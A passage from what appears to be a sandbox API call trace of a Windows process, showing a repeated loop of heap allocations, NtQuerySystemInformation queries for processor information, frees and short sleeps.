SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0241.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0241.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0241.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.345] Sleep (dwMilliseconds=0x110) [0241.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0241.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0241.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0241.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0241.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0241.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0241.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0241.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0241.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.364] Sleep (dwMilliseconds=0x110) [0241.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0241.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0241.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0241.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0241.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0241.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0241.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.381] Sleep (dwMilliseconds=0x110) [0241.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0241.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0241.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0241.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0241.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0241.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0241.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0241.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0241.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.396] Sleep (dwMilliseconds=0x110) [0241.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0241.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0241.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0241.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0241.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0241.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0241.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0241.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0241.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.411] Sleep (dwMilliseconds=0x110) [0241.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0241.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0241.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0241.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0241.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0241.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0241.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.443] Sleep (dwMilliseconds=0x110) [0241.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0241.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0241.459] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0241.459] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.460] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0241.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.461] Sleep (dwMilliseconds=0x110) [0241.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0241.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0241.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0241.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0241.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0241.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0241.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0241.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0241.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.474] Sleep (dwMilliseconds=0x110) [0241.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0241.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0241.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0241.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0241.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0241.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0241.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0241.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0241.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.485] Sleep (dwMilliseconds=0x110) [0241.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0241.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0241.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0241.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0241.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0241.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0241.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0241.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0241.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.505] Sleep (dwMilliseconds=0x110) [0241.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0241.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0241.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0241.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0241.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.521] Sleep (dwMilliseconds=0x110) [0241.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0241.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0241.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0241.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0241.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0241.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0241.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.535] Sleep (dwMilliseconds=0x110) [0241.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0241.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0241.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0241.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0241.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0241.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0241.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0241.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0241.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.551] Sleep (dwMilliseconds=0x110) [0241.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0241.559] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0241.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0241.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0241.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0241.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0241.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0241.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0241.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.562] Sleep (dwMilliseconds=0x110) [0241.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0241.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0241.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0241.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0241.584] RtlAllocateHeap 